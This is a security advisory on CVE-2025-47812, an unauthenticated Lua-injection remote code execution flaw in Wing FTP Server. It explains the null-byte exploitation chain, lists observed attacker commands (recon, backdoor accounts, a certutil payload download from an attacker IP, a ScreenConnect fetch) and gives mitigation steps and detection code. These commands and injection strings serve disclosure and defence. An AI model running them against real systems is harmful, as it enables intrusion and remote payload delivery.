On July 1, 2025, Huntress observed active exploitation of a critical remote code execution vulnerability affecting Wing FTP Server. The vulnerability was publicly disclosed on June 30, 2025 by security researcher Julien Ahrens, and in-the-wild exploitation began almost immediately. The flaw impacts multiple platforms including Windows, Linux, and macOS, and allows unauthenticated attackers to achieve SYSTEM-level remote code execution via null-byte and Lua injection through crafted login requests.
Severity Level: Critical
Vulnerability Details
- CVE ID: CVE-2025-47812
- Vulnerability Type: Remote Code Execution (RCE)
- CVSS Score: 10.0
- Affected Functionality: loginok.html authentication process
- Affected Products: Wing FTP Server versions before 7.4.4
Exploitation Chain: CVE-2025-47812
- Authentication Bypass via Null Byte
• The attacker sends a login request where the username contains a null byte (%00), followed by injected Lua code.
• Due to how strlen() works in C++, the validation only checks up to the null byte.
• Example username: anonymous%00]]–
- Session File Manipulation
• The session ID is assigned via the UID cookie.
• The raw username (including the injected code) is stored in _SESSION.
• The Lua code is stored in the session directory as a .lua file.
- Code Execution Trigger
• Accessing a page like dir.html causes the server to deserialize and execute the Lua session file.
• This results in remote code execution (RCE) with root/SYSTEM privileges depending on OS.
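The null-byte step above hinges on a length mismatch: a strlen()-style check stops at the first NUL, while the buffer that is later stored keeps everything after it. The following is an added example, not Wing FTP Server's code: it models that mismatch in Python on raw bytes, decoding a URL-encoded username the way a form parameter would be, and places the flawed check beside a hardened one. The character class, the 64-byte limit and the "INJECTED_LUA" placeholder are assumptions.

```python
# Added example (not Wing FTP Server's code): models how a strlen()-based
# validator is truncated by an embedded NUL byte, while the raw buffer that is
# later stored in the session still carries everything after the NUL.
import re
from urllib.parse import unquote_to_bytes

# Assumed username policy: a short, plain identifier.
ALLOWED = re.compile(rb"^[A-Za-z0-9_.-]{1,64}$")


def decode_login_username(param: str) -> bytes:
    """URL-decodes the form value; %00 becomes a real NUL byte in the buffer."""
    return unquote_to_bytes(param)


def c_strlen_view(buf: bytes) -> bytes:
    """What strlen()-based code 'sees': only the bytes before the first NUL."""
    return buf.split(b"\x00", 1)[0]


def validate_username_truncated(raw: bytes) -> bool:
    # Flawed pattern: validation covers only the strlen() view, so any bytes
    # after the NUL are never inspected but still travel with the buffer.
    return bool(ALLOWED.match(c_strlen_view(raw)))


def validate_username_full(raw: bytes) -> bool:
    # Hardened pattern: reject an embedded NUL outright and validate the full
    # byte length, not the C-string length.
    if b"\x00" in raw:
        return False
    return bool(ALLOWED.match(raw))


def stored_session_value(raw: bytes) -> bytes:
    """Models the 'raw username stored in _SESSION' step: the whole buffer survives."""
    return raw


def evaluate(param: str) -> dict:
    raw = decode_login_username(param)
    return {
        "strlen_view": c_strlen_view(raw),
        "passes_truncated_check": validate_username_truncated(raw),
        "passes_full_check": validate_username_full(raw),
        "stored": stored_session_value(raw),
    }


if __name__ == "__main__":
    # Constructed inputs; "INJECTED_LUA" stands in for attacker-supplied code.
    for sample in ("anonymous", "anonymous%00]]INJECTED_LUA"):
        print(sample, "->", evaluate(sample))
```

The second input passes the truncated check because the validator only ever looks at "anonymous", yet the stored value still contains the bytes after the NUL; the full-buffer check rejects it before anything reaches the session store.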
Observed Attack Details
- Recon and Enumeration
After exploiting CVE-2025-47812, attackers conducted local reconnaissance to validate access and assess the system environment. Key actions included:
• User discovery: whoami, net user, net user /all, whoami /priv
• Network insight: ipconfig, arp -a, nslookup
• Tool probing: curl, curl -help, attempted powershell execution
These commands reflect typical post-exploitation reconnaissance to identify user privileges, assess connectivity, and prepare for persistence or data exfiltration.
- Persistence Attempts
Attacker created local user accounts for persistence:
• net user wingftp 123123qweqwe /add
• net user wing 123123qweqweqwe /add
- Execution of Payloads
• Malicious payload downloaded via: certutil -urlcache -f http://185.196.9[.]225:8080/EOp45eWLSp5G5Uwp_yOCiQ %TEMP%\mvveiWJHx.exe
• Malformed curl commands and batch files were also observed but mostly failed due to syntax issues or Defender blocking.
• Attempted ScreenConnect install: curl -o c:\1.msi https://oooooooo11.screenconnect[.]com/bin/screenconnect.clientsetup.msi
Recommendations
- Immediately upgrade Wing FTP Server to version 7.4.4 or later. Older versions are vulnerable to RCE via Lua injection.
- If not required, disable anonymous login in Wing FTP configuration.
- Restrict access to Wing FTP ports via firewall rules to only trusted IP ranges.
- Look for unauthorized users like wing, wingftp. Disable/delete them.
- Block weak passwords like 123123qweqwe using GPOs or identity policy enforcement.
- Look for anomalous .lua files in C:\Program Files (x86)\Wing FTP Server\session\
- Monitor for suspicious child processes (cmd.exe / powershell.exe) spawned from WFTPServer.exe
- Where upgrading to a fixed version is not feasible, restrict or disable HTTP/HTTPS access to the Wing FTP web interface, turn off anonymous login, and closely monitor the session directory for any unusual or unauthorized file activity.
- Block the IOCs at their respective controls: https://www.virustotal.com/gui/collection/bff76c5cb45ffa975eeda7e6b011fe5ed4b0f304463c19d160cb6551c7992c57/iocs
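Three of the recommendations above (anomalous .lua files in the session directory, suspicious children of WFTPServer.exe, and the wing/wingftp accounts) can be turned into a small hunt. The script below is an added example, not part of the advisory or Huntress tooling: it runs the three checks over constructed sample data so the logic can be exercised offline. The session path is the one quoted in the advisory; the flat "Key=Value|Key=Value" event format, the Lua marker list and all sample contents are assumptions.

```python
# Added hunt example (not from the advisory or Huntress): applies three of the
# detection recommendations to constructed sample data. The event record format,
# marker list and sample contents are assumptions; the session path is the one
# named in the advisory and may differ per installation.
import re
from pathlib import PureWindowsPath

SESSION_DIR = PureWindowsPath(r"C:\Program Files (x86)\Wing FTP Server\session")

# Lua calls that have no business inside a serialised session file (assumed list).
LUA_EXEC_MARKERS = re.compile(
    r"\b(os\.execute|io\.popen|loadstring|load)\s*\(", re.IGNORECASE
)

# Children of the FTP service process worth alerting on (from the observed activity).
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "certutil.exe", "curl.exe"}

# Account names created by the attacker in the observed intrusion.
SUSPICIOUS_ACCOUNTS = {"wing", "wingftp"}


def scan_session_files(files: dict) -> list:
    """files: {path: content}. Flags .lua session files that contain executable Lua."""
    hits = []
    for path, content in files.items():
        p = PureWindowsPath(path)
        if p.suffix.lower() != ".lua":
            continue
        m = LUA_EXEC_MARKERS.search(content)
        if m:
            hits.append({"file": str(p), "marker": m.group(1)})
    return hits


def parse_event(line: str) -> dict:
    """Parses one flat 'Key=Value|Key=Value' process-creation record (constructed format)."""
    return dict(kv.split("=", 1) for kv in line.strip().split("|") if "=" in kv)


def detect_child_processes(events: list) -> list:
    """Flags process-creation events whose parent is WFTPServer.exe and child is suspicious."""
    findings = []
    for line in events:
        ev = parse_event(line)
        parent = PureWindowsPath(ev.get("ParentImage", "")).name.lower()
        child = PureWindowsPath(ev.get("Image", "")).name.lower()
        if parent == "wftpserver.exe" and child in SUSPICIOUS_CHILDREN:
            findings.append({"child": child, "cmd": ev.get("CommandLine", "")})
    return findings


def find_rogue_accounts(local_users: list) -> list:
    """Returns local account names matching the ones created in the observed attack."""
    return sorted(u for u in local_users if u.lower() in SUSPICIOUS_ACCOUNTS)


# ---- constructed sample data -------------------------------------------------
SAMPLE_SESSION_FILES = {
    str(SESSION_DIR / "3f2a9c.lua"): '_SESSION["username"]="alice"\n',
    str(SESSION_DIR / "b81d0e.lua"): '_SESSION["username"]="anonymous"]]\nos.execute("whoami")--',
    str(SESSION_DIR / "notes.txt"): "os.execute(",  # not a .lua file, ignored
}

SAMPLE_EVENTS = [
    r"ParentImage=C:\Program Files (x86)\Wing FTP Server\WFTPServer.exe|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd /c whoami",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd",
    r"ParentImage=C:\Program Files (x86)\Wing FTP Server\WFTPServer.exe|Image=C:\Windows\System32\certutil.exe|CommandLine=certutil -urlcache -f http://[PLACEHOLDER] %TEMP%\x.exe",
]

SAMPLE_USERS = ["Administrator", "Guest", "wingftp", "svc_backup"]


def run_hunt() -> dict:
    return {
        "session_files": scan_session_files(SAMPLE_SESSION_FILES),
        "child_processes": detect_child_processes(SAMPLE_EVENTS),
        "rogue_accounts": find_rogue_accounts(SAMPLE_USERS),
    }


if __name__ == "__main__":
    for section, findings in run_hunt().items():
        print(section, findings)
```

On real hosts, feed scan_session_files() the actual contents of the session directory, point detect_child_processes() at process-creation telemetry (Sysmon event ID 1 or the EDR equivalent) after adapting parse_event() to that source's field names, and populate the user list from the local SAM; a benign .lua session file should never trip the marker regex, so any hit warrants a look at the file and at the UID cookie that created it.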
Source:
- https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-critical-rce-flaw-in-wing-ftp-server/
- https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
- https://www.huntress.com/blog/wing-ftp-server-remote-code-execution-cve-2025-47812-exploited-in-wild